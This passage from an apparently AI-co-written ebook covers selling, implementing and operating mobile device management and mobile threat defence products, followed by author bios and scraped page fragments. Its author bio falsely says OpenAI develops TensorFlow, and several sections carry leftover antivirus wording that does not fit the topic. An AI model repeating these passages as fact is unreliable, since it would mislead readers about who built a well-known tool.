3. What remote management features are needed to be included in the MDM solution?
4. How does the MDM solution need to handle device enrolment and configuration?
5. What is the deployment model for the MDM solution (cloud-based or on-premises)?
MTD:
1. Does the MTD solution need to provide real-time monitoring and protection against
security threats?
2. How does the MTD solution need to detect and prevent malware and phishing
attacks?
3. What types of security threats does the MTD solution need to protect against?
4. How does the MTD solution need to integrate with other security solutions (e.g.,
firewalls, intrusion detection systems)?
5. What is the deployment model for the MTD solution (cloud-based or on-premises)?

It is recommended to ask problem areas and use-cases from the prospective client to
understand the solution's real-world effectiveness and benefits for organizations similar to
your own.
4.2.2 Questions prospective client will ask of sales
Clients evaluating Enterprise Mobility Management (EMM), Mobile Device Management

(MDM), or Mobile Threat Defense (MTD) solutions may have a variety of questions based on
their specific needs and requirements. Here are some common questions that clients ask:
EMM:
1. Can the EMM solution manage and secure both corporate and personal devices?
2. How does the EMM solution handle mobile application management (MAM)?
3. What security and access control features are included in the EMM solution?
4. How easy is it to deploy and manage the EMM solution?
5. How does the EMM solution handle data protection and privacy?
MDM:
1. What type of devices does the MDM solution support?
2. How does the MDM solution enforce security policies on mobile devices?
3. Can IT administrators manage and secure devices remotely?
4. How easy is it to enrol and configure devices in the MDM solution?
5. What types of reporting and analytics are available in the MDM solution?
MTD:
1. Does the MTD solution provide real-time monitoring and protection against security
threats?
2. How does the MTD solution detect and prevent malware and phishing attacks?
3. What types of security threats does the MTD solution protect against?
4. How does the MTD solution integrate with other security solutions (e.g., firewalls,
intrusion detection systems)?
5. What is the impact on device performance when the MTD solution is installed?
It is recommended to provide clear and concise answers to these questions, and to
demonstrate how the solution addresses the client's specific requirements and concerns.
Additionally, it may be helpful to provide relevant case studies or client references to show
how the solution has benefited similar organizations.
4.2.3 Payment terms to agree with the clients
All EMM, MDM, MTD technology owners ask for advance payments, almost always 100% in
advance. So, unless clients pay similarly, the service providers come under heavy cash-flow
situations. Therefore, agreeing on 100% advance payments or back-to-back (client pays
services/ system integrator and system integrator pays EMM, MDM, MTD technology owners

via distributors) payment options with clients always keeps the cash-registers green and
healthy.
The payment terms for Enterprise Mobility Management (EMM), Mobile Device Management
(MDM), or Mobile Threat Defense (MTD) solutions can vary depending on the specific
solution. Here are some common payment terms that clients may agree with clients and
EMM, MDM, MTD technology owners:
1. Subscription-based: Clients pay a recurring fee (e.g., monthly, or annually) for access
to the EMM, MDM, or MTD solution. This model is commonly used for cloud-based
solutions.
2. Per-device pricing: Clients pay a fee for each device that is enrolled in the EMM, MDM,
or MTD solution. This model is commonly used for on-premises solutions.
3. Volume pricing: Clients receive discounts based on the number of devices enrolled in
the EMM, MDM, or MTD solution.
4. Licensing: Clients pay a one-time fee for a license to use the EMM, MDM, or MTD
solution. This model is commonly used for on-premises solutions.
It is important to carefully review and understand the payment terms before entering into an
agreement. It is also recommended to discuss and negotiate any potential discounts or
incentives that may be available, based on the number of devices enrolled or the length of
the agreement. The specific payment terms will depend on the solution being offered. It's
always recommended to carefully review the terms and conditions of an antivirus solution
before making a purchase.
4.3 Pre-sales cue: Solution building complexities
4.3.1 Sizing the solution
Sizing an Enterprise Mobility Management (EMM), Mobile Device Management (MDM), or

Mobile Threat Defense (MTD) solution involves determining the appropriate resources and
capacities required to effectively manage and secure mobile devices in your organization.
Here are some factors to consider when sizing an EMM, MDM, or MTD solution:
1. Number of devices: The number of mobile devices in your organization is a key factor
in determining the appropriate resources and capacities required for the EMM, MDM,
or MTD solution.
2. Types of devices: The types of devices used in your organization (e.g., smartphones,
tablets, laptops) can impact the resources and capacities required for the EMM, MDM,
or MTD solution.
3. Security requirements: The level of security required for your organization's mobile
devices will impact the resources and capacities required for the EMM, MDM, or MTD
solution.
4. User requirements: The specific requirements of your users (e.g., device management,
application management, data protection) can impact the resources and capacities
required for the EMM, MDM, or MTD solution.

5. Deployment model: The deployment model for the EMM, MDM, or MTD solution (e.g.,
cloud-based, on-premises) can impact the resources and capacities required for the
solution.
It is important to work closely with the technology owner and client to ensure that the EMM,
MDM, or MTD solution is appropriately sized for organization's specific requirements. The
technology owner and client should be able to provide guidance and recommendations based
on organization's specific needs and requirements.
4.3.2 To what will EMM, MDM, MTD solution connect to?
Enterprise Mobility Management (EMM), Mobile Device Management (MDM), and Mobile
Threat Defense (MTD) solutions can integrate with a variety of other systems to enhance their
functionality and capabilities. Some common systems that may connect to an EMM, MDM, or
MTD solution include:
1. Active Directory (AD): Integration with AD allows for seamless user authentication and
authorization within the EMM, MDM, or MTD solution.
2. Identity and Access Management (IAM) systems: Integration with IAM systems can
enhance the security of the EMM, MDM, or MTD solution by providing additional
layers of authentication and authorization.
3. Mobile Application Management (MAM) solutions: Integration with MAM solutions
can enhance the application management capabilities of the EMM, MDM, or MTD
solution.
4. Mobile content management systems: Integration with mobile content management
systems can enhance the data protection and privacy capabilities of the EMM, MDM,
or MTD solution.
5. Email systems: Integration with email systems can enhance the email management
capabilities of the EMM, MDM, or MTD solution.
6. Network security solutions: Integration with network security solutions (e.g., firewalls,
intrusion detection systems) can enhance the security of the EMM, MDM, or MTD
solution by providing additional layers of protection.
It is important to carefully evaluate the integration requirements of organization's systems
and to work with the System Integrator to ensure that the EMM, MDM, or MTD solution
integrates with the necessary systems. The System Integrator should be able to provide
guidance and recommendations on the most appropriate integration approach.
4.3.3 Implementation steps of EMM, MDM, MTD solution
The implementation of an Enterprise Mobility Management (EMM), Mobile Device

Management (MDM), or Mobile Threat Defense (MTD) solution typically involves the
following steps:
1. Requirements gathering: This involves identifying the specific requirements of
organization for mobile device management, security, and data protection.

2. Solution selection: This involves selecting the appropriate EMM, MDM, or MTD
solution for organization based on the requirements gathered in the first step.
3. Installation: The installation of an Enterprise Mobility Management (EMM), Mobile
Device Management (MDM), or Mobile Threat Defense (MTD) solution typically
involves the following steps:
a. Prepare the environment: This involves verifying that the necessary hardware,
software, and network infrastructure is in place to support the EMM, MDM, or
MTD solution.
b. Download the software: This involves downloading the EMM, MDM, or MTD
software from the vendor's website or through a distribution channel.
c. Install the software: This involves installing the EMM, MDM, or MTD software
on the necessary servers, devices, or gateways.
d. Configure the solution: This involves configuring the EMM, MDM, or MTD
solution to meet the specific requirements of organization. This may include
setting up device policies, configuring security settings, and integrating with
other systems as needed.
e. Deploy the solution: This involves deploying the EMM, MDM, or MTD solution
to organization's users. This may involve installing software on devices,
enrolling devices in the solution, and configuring devices to meet the
organization's requirements.
f. Test the solution: This involves testing the EMM, MDM, or MTD solution to
ensure that it is functioning as expected.
4. Solution configuration: This involves configuring the EMM, MDM, or MTD solution to
meet the specific requirements of organization. This may include setting up device
policies, configuring security settings, and integrating with other systems as needed.
5. User training: This involves providing training to organization's users on how to use
the EMM, MDM, or MTD solution. This may include training on how to enrol devices,
manage device policies, and access data and applications securely.
6. Deployment: This involves deploying the EMM, MDM, or MTD solution to
organization's users. This may involve installing software on devices, enrolling devices
in the solution, and configuring devices to meet the organization's requirements.
7. Monitoring and maintenance: These involve monitoring the EMM, MDM, or MTD
solution to ensure that it is functioning as expected, and performing maintenance and
updates as needed to keep the solution up-to-date and secure.
These are the general steps involved in implementing an EMM, MDM or MTD solution. The
specific steps will depend on the needs and requirements of the organization, as well as the
solution being used.
4.3.4 What can go wrong in EMM, MDM, MTD solution
There are several things that can go wrong when implementing an Enterprise Mobility
Management (EMM), Mobile Device Management (MDM), or Mobile Threat Defense (MTD)
solution, including:

1. Complexity: The implementation and use of an EMM, MDM, or MTD solution can be
complex and require a significant investment of time and resources.
2. Integration challenges: Integrating the EMM, MDM, or MTD solution with other
systems, such as email, file storage, and security systems, can be challenging and may
require significant effort and expertise.
3. User adoption: Getting users to adopt the EMM, MDM, or MTD solution can be a
challenge, particularly if the solution is perceived as cumbersome or difficult to use.
4. Performance issues: The EMM, MDM, or MTD solution can impact the performance of
devices, leading to slow response times, battery drain, and other issues.
5. Data security: Ensuring that sensitive data is protected and remains secure can be a
challenge with an EMM, MDM, or MTD solution.
6. Compliance challenges: Ensuring that the EMM, MDM, or MTD solution is compliant
with various regulations and standards can be a complex and time-consuming process.
7. Vendor support: Ensuring that the vendor provides adequate support, and that the
solution is up-to-date and secure can be a challenge.
These are just some of the potential issues that can arise when implementing an EMM, MDM,
MTD solution. It's important to carefully consider these risks and take steps to mitigate them,
such as properly configuring the solution, regularly updating virus definitions, and providing
user education and training.
4.3.5 What Service Levels can be committed/ expected?
Service Level Agreements (SLAs) in EMM MDM MTD services can vary depending on the
specific needs of an organization and the level of service offered by the provider. However,
some common SLAs that can be committed in EMM MDM MTD solution include:
1. Availability: The percentage of time that the EMM, MDM, or MTD solution is available
and accessible to users.
2. Response time: The amount of time it takes for the vendor to respond to support
requests or incidents.
3. Resolution time: The amount of time it takes for the technology owner to resolve
support requests or incidents.
4. Upgrades: The frequency and timing of software upgrades and patches provided by
the vendor.
5. Data protection: The level of protection provided for sensitive data stored or
processed by the EMM, MDM, or MTD solution.
6. Compliance: The level of compliance with various regulations and standards required
by the organization.
7. Training: The level of training provided to users and administrators on the use of the
EMM, MDM, or MTD solution.
These are just a few examples of the types of SLAs that can be committed in EMM, MDM, or
MTD services. The specific SLAs that are included in a contract will depend on the needs and
requirements of the organization. But, please keep in mind, it is not always possible to

accurately provide a resolution time commitment and hence, take penalty conditions in
contracts.
4.3.6 Why can't any vendor commit resolution time/ SLA accurately?
Accurately providing a resolution time commitment in cybersecurity is challenging for several

reasons:
1. Complexity of security incidents: Cybersecurity incidents can range from simple
malware infections to complex, multi-faceted attacks that are difficult to fully
understand and resolve. This makes it difficult to accurately predict the amount of
time it will take to resolve a given incident.
2. Evolving threats: The nature of cyber threats is constantly evolving, with new and more
sophisticated attacks appearing all the time. This means that even experienced
cybersecurity teams may encounter new and unexpected challenges when attempting
to resolve an incident, which can make it difficult to provide accurate resolution time
commitments.
3. Interdependencies: Many cybersecurity incidents involve multiple systems and
technologies and resolving one issue may require resolving multiple underlying issues.
This can make it difficult to accurately predict the amount of time it will take to fully
resolve an incident.
4. Limited information: In many cases, the information available about a cybersecurity
incident may be limited or incomplete, making it difficult to accurately assess the
scope of the issue and predict the amount of time it will take to resolve.
Given these challenges, it is not always possible to accurately provide a resolution time
commitment in cybersecurity. Instead, cybersecurity teams may aim to provide a range of
possible resolution times, or a commitment to resolve the incident as quickly as possible,
while ensuring that all necessary steps are taken to thoroughly resolve the issue and prevent
future incidents.
4.4 Delivery cue- EMM MDM MTD operations
4.4.1 Daily Activities
Daily EMM MDM MTD operation activities typically include the following tasks:
1. Monitoring: Regularly monitoring the EMM, MDM, or MTD solution to ensure that it
is functioning properly and to identify any issues or potential threats.
2. Device management: Managing and updating the configurations of mobile devices,
including enrolling new devices, managing device profiles, and securing devices.
3. User management: Managing and updating user accounts, including creating new
accounts, revoking access, and managing user permissions.
4. Security management: Implementing and monitoring security policies, such as device
encryption, password policies, and access control.
5. Software updates: Installing software updates and patches to ensure that the EMM,
MDM, or MTD solution is up-to-date and secure.

6. Reporting: Generating and reviewing reports to monitor the use of mobile devices,
security threats, and other relevant metrics.
7. Compliance: Ensuring that the EMM, MDM, or MTD solution complies with various
regulations and standards required by the organization.
8. Training: Providing training and support to users and administrators on the use of the
EMM, MDM, or MTD solution.
It is important to establish a routine and regularly perform these activities to ensure that the
EMM, MDM, or MTD solution is functioning properly and providing the necessary protection
and support for mobile devices.
In short, daily EMM, MDM, or MTD solution operation activities are essential to ensuring the
effective protection of a computer or network against malware and other cyber threats. By
performing these tasks regularly, organizations can keep their anti-virus software up-to-date
and effectively respond to any potential threats.
4.4.2 Weekly Activities
Weekly EMM, MDM, or MTD operation activities typically include the following tasks:
1. Device inventory management: Updating the inventory of mobile devices, including
adding new devices, retiring old devices, and updating device information.
2. Policy management: Reviewing and updating security policies to ensure that they
remain effective and relevant.
3. Incident management: Reviewing and responding to security incidents, such as
malware infections, lost or stolen devices, or unauthorized access attempts.
4. Compliance reporting: Generating and reviewing reports to ensure that the EMM,
MDM, or MTD solution follows various regulations and standards required by the
organization.
5. User training: Providing training and support to users and administrators on the use of
the EMM, MDM, or MTD solution.
6. System updates: Installing software updates and patches to ensure that the EMM,
MDM, or MTD solution is up-to-date and secure.
7. Performance monitoring: Monitoring the performance of the EMM, MDM, or MTD
solution and identifying any potential issues.
It is important to establish a routine and regularly perform these activities to ensure that the
EMM, MDM, or MTD solution is functioning properly and providing the necessary protection
and support for mobile devices. Additionally, these weekly activities can help identify areas
for improvement and ensure that the EMM, MDM, or MTD solution continues to meet the
evolving needs of the organization.
4.4.3 Monthly Activities
Monthly EMM, MDM, or MTD operation activities typically include the following tasks:

1. Device audit: Auditing the inventory of mobile devices to ensure accuracy and to
identify any discrepancies or missing devices.
2. Security assessment: Conducting a security assessment to identify potential threats
and vulnerabilities, and to assess the effectiveness of existing security policies.
3. Compliance review: Reviewing the compliance status of the EMM, MDM, or MTD
solution with various regulations and standards required by the organization.
4. User feedback: Gathering feedback from users and administrators on the use of the
EMM, MDM, or MTD solution, and incorporating this feedback into future updates and
improvements.
5. System optimization: Optimizing the performance of the EMM, MDM, or MTD
solution, including tuning settings and configurations, and optimizing resource
utilization.
6. Budget review: Reviewing the budget and resources dedicated to the EMM, MDM, or
MTD solution, and making recommendations for future investments.
7. Reporting: Generating and reviewing reports to provide a comprehensive overview of
the status of the EMM, MDM, or MTD solution, including usage statistics, security
incidents, and other relevant metrics.
It is important to establish a routine and regularly perform these monthly activities to ensure
that the EMM, MDM, or MTD solution is functioning properly and providing the necessary
protection and support for mobile devices. Additionally, these monthly activities can help
identify areas for improvement and ensure that the EMM, MDM, or MTD solution continues
to meet the evolving needs of the organization.
4.4.4 What does an L1 EMM, MDM, or MTD Engineer do?
An L1 EMM, MDM, or MTD Engineer is responsible for providing first-level technical support
and resolving simple issues. This may include tasks such as password resets, device enrolment,
and basic troubleshooting. L1 (Level 1) EMM (Enterprise Mobility Management), MDM
(Mobile Device Management), or MTD (Mobile Threat Defense) Engineer activities typically
involve the following:
1. Providing first-level technical support: The L1 engineer is responsible for handling the
initial support requests and troubleshooting issues related to EMM, MDM, or MTD
systems. They should have a good understanding of the system and be able to resolve
basic issues or escalate them to the appropriate level.
2. Monitoring system alerts: The L1 engineer is responsible for monitoring system alerts
and notifications and taking appropriate action when necessary. This can include
investigating system failures or errors, resolving issues related to user access, or
escalating issues to higher levels when necessary.
3. Performing system maintenance: The L1 engineer is responsible for performing
regular maintenance tasks, such as system updates and patches, to ensure that the
EMM, MDM, or MTD system is functioning properly.

4. Documenting and reporting issues: The L1 engineer is responsible for documenting
and reporting any issues or problems related to the EMM, MDM, or MTD system. They
should keep detailed records of support requests, troubleshooting steps, and
resolutions.
5. Providing end-user training: The L1 engineer may be responsible for providing basic
training and support to end-users on how to use the EMM, MDM, or MTD system. This
can include providing guidance on how to access and use applications, or how to
configure devices to meet organizational security requirements.
6. Performing security tasks: The L1 engineer may be responsible for performing basic
security tasks, such as reviewing logs, conducting security scans, or configuring
security policies, to help ensure that the EMM, MDM, or MTD system is secure.
Overall, the L1 EMM, MDM, or MTD engineer plays a critical role in ensuring the smooth
functioning of the system, providing basic support and troubleshooting, and escalating issues
when necessary.
L2 (Level 2) EMM (Enterprise Mobility Management), MDM (Mobile Device Management), or

MTD (Mobile Threat Defense) Engineer activities involve more advanced technical support
and troubleshooting tasks, such as:
1. Providing technical support: The L2 engineer provides more advanced technical
support, troubleshooting issues that could not be resolved by the L1 engineer. This
may involve more in-depth analysis and investigation of the root cause of the problem.
2. Performing system upgrades and migrations: The L2 engineer may be responsible for
performing system upgrades and migrations, such as moving the EMM, MDM, or MTD
system to a new platform or version.
3. Developing and implementing system integrations: The L2 engineer may be
responsible for developing and implementing system integrations, such as integrating
the EMM, MDM, or MTD system with other systems in the organization.
4. Developing and implementing automation scripts: The L2 engineer may develop and
implement automation scripts to help streamline the management of the EMM, MDM,
or MTD system.
5. Conducting system testing: The L2 engineer may be responsible for conducting system
testing, such as testing new features, patches, or updates to ensure that they function
properly and do not cause issues.
6. Providing training and mentoring: The L2 engineer may be responsible for providing
training and mentoring to L1 engineers, or to end-users who need more advanced
technical training on the EMM, MDM, or MTD system.
Overall, the L2 EMM, MDM, or MTD engineer provides more advanced technical support and
takes on more complex tasks related to the management of the system. They work closely
with L1 engineers and other technical staff to ensure the smooth functioning of the system
and to provide support to end-users as needed.

L3 (Level 3) EMM (Enterprise Mobility Management), MDM (Mobile Device Management), or

MTD (Mobile Threat Defense) Engineer activities involve highly specialized technical support
and problem-solving tasks, such as:
1. Providing advanced technical support: The L3 engineer provides advanced technical
support, resolving complex technical issues that could not be resolved by L1 or L2
engineers.
2. Conducting root cause analysis: The L3 engineer is responsible for conducting root
cause analysis of complex technical issues, identifying underlying problems and
developing solutions to prevent their recurrence.
3. Designing and implementing system architecture: The L3 engineer may be responsible
for designing and implementing the system architecture, including the hardware,
software, and network infrastructure required to support the EMM, MDM, or MTD
system.
4. Developing and implementing custom solutions: The L3 engineer may be responsible
for developing and implementing custom solutions, such as scripts or plugins, to
address specific technical challenges or business requirements.
5. Evaluating new technologies and solutions: The L3 engineer may be responsible for
evaluating new technologies and solutions, such as new mobile devices or operating
systems, and developing strategies for incorporating them into the EMM, MDM, or
MTD system.
6. Providing training and mentoring: The L3 engineer may be responsible for providing
training and mentoring to L1 and L2 engineers, as well as to other technical staff and
end-users.
Overall, the L3 EMM, MDM, or MTD engineer is a highly specialized technical expert,
responsible for resolving complex technical issues and ensuring the smooth functioning of the
system. They work closely with other technical staff, management, and end-users to provide
support, solve problems, and drive the ongoing development and improvement of the system.
4.4.7 Reports
EMM, MDM, or MTD operation reports typically include the following:

1. Device inventory report: A report that provides an inventory of all mobile devices
enrolled in the EMM, MDM, or MTD solution. This report can include information such
as device type, operating system, and ownership.
2. Security report: A report that provides information about the security status of mobile
devices, including the number of security incidents, the types of incidents, and the
devices affected.

3. Compliance report: A report that provides information about the compliance status of
mobile devices with security policies, regulations, and standards required by the
organization.
4. User report: A report that provides information about the usage of mobile devices,
including the number of devices in use, the number of applications installed, and the
amount of data transmitted.
5. Resource utilization report: A report that provides information about the resource
utilization of the EMM, MDM, or MTD solution, including the amount of storage used,
the number of processors used, and the amount of network bandwidth used.
6. Incident response report: A report that provides information about incidents that have
been reported and the steps taken to resolve them. This report can be used to track
the status of incidents and to ensure that they are being resolved in a timely manner.
In short, EMM, MDM, or MTD operation reports provide valuable insights into the
security of a mobile or network and are essential for understanding the effectiveness of the
EMM, MDM, or MTD solution and for identifying areas for improvement. It is important to
regularly review and analyse these reports to ensure that the EMM, MDM, or MTD solution is
functioning properly and providing the necessary protection and support for mobile devices.
4.4.8 Governance of EMM, MDM, or MTD solution
Governance refers to the processes and policies that ensure the effective and efficient
management of an Enterprise Mobility Management (EMM), Mobile Device Management
(MDM), or Mobile Threat Defense (MTD) solution. Effective governance of these solutions is
crucial to ensure that they provide the necessary protection and support for mobile devices,
while also balancing the needs of the organization and its employees. The following are some
key elements of governance for an EMM, MDM, or MTD solution:
1. Policies and procedures: Policies and procedures are the foundation of effective
governance for an EMM, MDM, or MTD solution. They provide guidelines and
standards for how the solution should be used and maintained and help ensure that it
is used in a consistent and effective manner.
2. Security controls: Effective governance of an EMM, MDM, or MTD solution requires
the implementation of robust security controls to protect against threats and prevent
data breaches. These controls can include encryption, access control, and security
monitoring and reporting.
3. Compliance management: Compliance with regulations and standards is an important
aspect of governance for an EMM, MDM, or MTD solution. Organizations must ensure
that their solution is compliant with relevant regulations and standards, such as HIPAA,
PCI DSS, and ISO 27001.
4. User management: Effective governance of an EMM, MDM, or MTD solution requires
the proper management of users and their access to the solution. This includes the
management of user roles, permissions, and authentication.
5. Risk management: Risk management is a crucial component of governance for an
EMM, MDM, or MTD solution. Organizations must assess the risks associated with
their solution and implement controls to mitigate these risks.

6. Incident management: Effective governance of an EMM, MDM, or MTD solution
requires the proper management of incidents, such as security breaches and system
failures. This includes the development of incident response plans and procedures, as
well as the implementation of monitoring and reporting capabilities.
Effective governance of an EMM, MDM, or MTD solution is essential to ensure that it provides
the necessary protection and support for mobile devices while balancing the needs of the
organization and its employees. Regularly reviewing and updating governance policies and
procedures can help ensure that the solution remains effective and efficient over time.
================== END==================

About the authors
As a CISO and Head, Cybersecurity, Sudhansu M Nayak specialises and spearheads enterprise
cybersecurity (IT/ OT), cloud, and data transformation solutions. He advises CxOs and Executive Boards
on cyber risks and techno-operational mitigation, data privacy and protection, and compliance and
governance.
As an avid consultant to multiple think-tanks, he contributes to building of various components of
national cybersecurity policies. His research and views have been cited in Centre for Land Warfare
Studies (CLAWS), The Cyber Defense Review, (Army Cyber Institute, Australia), DQChannels,
TechPanda, and others.
To bridge the cybersecurity skill-gaps, he mentors, corporates, students, and startups. A passionate
speaker, he talks on Cybersecurity and its engagement in international policies and digital
transformation. His current research is focussed on the interplay of cybersecurity with global peace,
state espionage, climate change, international trade, and strategic diplomacy.
In his free time, Sudhansu writes on Indian temples, experiments on indo-continental dishes, and
dabbles in photography.
Twitter: @smnayak
LinkedIn: https://www.linkedin.com/in/sudhansunayak/
OpenAI is an artificial intelligence research organization founded in 2015 by a group of prominent

technology leaders, including Elon Musk, Sam Altman, Greg Brockman, and others. OpenAI's mission
is to develop and promote friendly AI for the betterment of humanity, while also considering and
addressing potential risks and challenges posed by artificial intelligence. OpenAI conducts research in
a variety of fields related to AI, including deep learning, reinforcement learning, natural language
processing, robotics, and more. It also develops and releases software tools and platforms for machine
learning and AI development, including the popular deep learning framework TensorFlow. OpenAI has
made significant contributions to the field of AI, and its work has been widely recognized and awarded.

What Is Endpoint Security

Uploaded by

Copyright:

Available Formats

What Is Endpoint Security

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

What Is Endpoint Security

Uploaded by

Copyright:

Available Formats

Endpoint Security

Sudhansu M Nayak & OpenAI

Page 2 of 52 Open to all

Page 3 of 52 Open to all

Page 4 of 52 Open to all

Page 5 of 52 Open to all

Page 6 of 52 Open to all

Page 7 of 52 Open to all

Page 8 of 52 Open to all

There are several types of anti-virus (AV) solutions, including:

Page 9 of 52 Open to all

Page 10 of 52 Open to all

3.2 Sales cue- Questions to ask and answers to give

3.2.1 Questions to ask prospective client

Page 11 of 52 Open to all

3.2.2 Questions prospective clients will ask of sales

Page 12 of 52 Open to all

Page 13 of 52 Open to all

3.3.1 Sizing the anti-virus solution

An antivirus solution can potentially connect to a variety of other organizational systems,

Page 14 of 52 Open to all

The implementation steps of an antivirus solution typically involve the following:

Page 15 of 52 Open to all

Page 16 of 52 Open to all

Page 17 of 52 Open to all

Accurately providing a resolution time commitment in cybersecurity is challenging for several

Page 18 of 52 Open to all

3.4.1 Daily Anti-virus operations activities

Daily anti-virus operation activities typically include the following tasks:

Page 19 of 52 Open to all

Weekly anti-virus operation activities typically include the following tasks:

Monthly anti-virus operation activities typically include the following tasks:

Page 20 of 52 Open to all

3.4.4 What does an L1 Antivirus Engineer do?

Page 21 of 52 Open to all

3.4.5 What does an L2 Antivirus Engineer do?

An L2 (Level 2) Antivirus Engineer is responsible for investigating and responding to security

3.4.6 What does an L3 Antivirus Engineer do?

Page 22 of 52 Open to all

Page 23 of 52 Open to all

Page 24 of 52 Open to all

Vulnerability Review the status of identified vulnerabilities on endpoints and

Page 25 of 52 Open to all

Page 26 of 52 Open to all

Page 27 of 52 Open to all

Page 28 of 52 Open to all

Page 29 of 52 Open to all

Page 30 of 52 Open to all

Page 31 of 52 Open to all

Anti-virus operation reports typically include the following:

3.4.10 Reports- EDR Operations

EDR operation reports typically include the following:

Page 32 of 52 Open to all

3.4.11 Governance of Antivirus solution

Page 33 of 52 Open to all

3.4.12 Governance of EDR solution

Page 34 of 52 Open to all

Page 35 of 52 Open to all

Page 36 of 52 Open to all